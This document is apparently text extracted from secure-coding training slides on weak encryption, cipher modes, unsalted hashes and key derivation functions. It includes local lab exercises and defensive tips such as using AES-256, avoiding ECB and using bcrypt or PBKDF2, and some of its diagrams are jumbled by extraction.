» Encryption is done with “Proprietary Encryption” - seldom
works

» Encryption with weak key sizes and modes - 3 DES ECB, or
DES ECB, RC4, etc are weak ciphers

» Hardcoded or easily accessible keys

» Lack of key rotation



SENSITIVE DATA - WEAK ONE-WAY HASHING

» Use of unsalted hashes from MD5 and SHA-1 - Can be
compromised easily

» Salting of Hashes - Adds marginal entropy and security to
the hashed value

» Salted hashes don’t hold up against advanced hash
cracking techniques with great hardware



plaintext “Secure Java
for Web Application
Development”

Cipher text:
“kduihwjbjhweuhweid]
kdjkHJFTYFUHjbjjhuihi
ojilhfrertftyrestullip678

789"

encryption algorithm -
encryption process

encryption algorithm -
decryption process

Cipher text:
“kduihwjbjhweuhweid]
kdjkHJFTYFUHjbjjhuihi
ojilhfrertftyrestullip678

789"

plaintext “Secure Java
for Web Application
Development”
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MODES OF ENCRYPTION

» Block Ciphers - Use modes of encryption

» Some modes can introduce vulnerabilities into the
cryptographic implementation

» Recommended Modes: CCM and GCM

» Not recommended: ECB



ECB MODE

Cleartext data block

|

Encryption Key

Block Cipher

Cleartext data block

|

Encryption Key

L

Ciphertext Data Block

Block Cipher

L

Ciphertext Data Block




CIPHER FEEDBACK MODE (CFB)
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Initialization
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CIPHER BLOCK CHAINING (CBC)

Cleartext data block Cleartext data block
Initialization
vector *jL JL
Encryption Key :D Block Cipher Encryption Key > Block Cipher

I L

Ciphertext Data Block Ciphertext Data Block




COUNTER MODE
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HASHING

» Hash functions convert variable length messages into
cryptographically secure fixed length strings

» However, with increasing compute power, hash cracking
using brute force or rainbow tables have become feasible.

» Two of the most popular hashing algos - MD5 and SHA1
can easily be cracked.



INSECURE CRYPTO - MODES OF ENCRYPTION EXERCISE

» Goto: http://localhost/encrypt_modes/

» Type in any string
» Observe the results

» Source: cd /webapps/ctf2/hospital/hospital/utils.py


http://localhost/encrypt_modes/

ONE-WASH HASH

SALTING



SALTED VS UNSALTED HASHES

» Goto: http://localhost/secure/hash
» Type in a word

» Observe the results of the same word being hashed three
times using the SHA1 Hashing Function

» View the Source:

» Goto views.py

» Line: 660


http://localhost/secure/hash

KEY DERIVATION FUNCTIONS - PROTECTING PASSWORDS

» One-way hashing was developed to predominantly
perform Integrity Verification

» However, against modern hardware and cracking
techniques, even salted hashes don't hold up

» Password Based Key Derivation Functions - more secure
alternative to salted password hashes



PASSWORD )

KEY DERIVATION FUNCTIONS

PASSWORD-BASED




KEY DERIVATION FUNCTIONS - PROTECTING PASSWORDS

» Goto: /webapps/ctf2/hospital

» run python hash times.py



TIPS - CRYPTO

» Use strong encryption algos - AES-256, etc

» Use strong modes of encryption - block cipher - other than
ECB

» Use key protection techniques - Key Encryption/Wrapper
Key

» Store keys in secure and different locations

» Provide for Key Rotation and Key Retirement



TIPS - HASHING FUNCTIONS

» Consider using Key Derivation Functions as opposed to
Hash Functions

» If using Hashing, salting is a necessity
» Use strong hash algos like SHA-224 and above

» Key Derivation Functions like bcrypt or PBKDF2



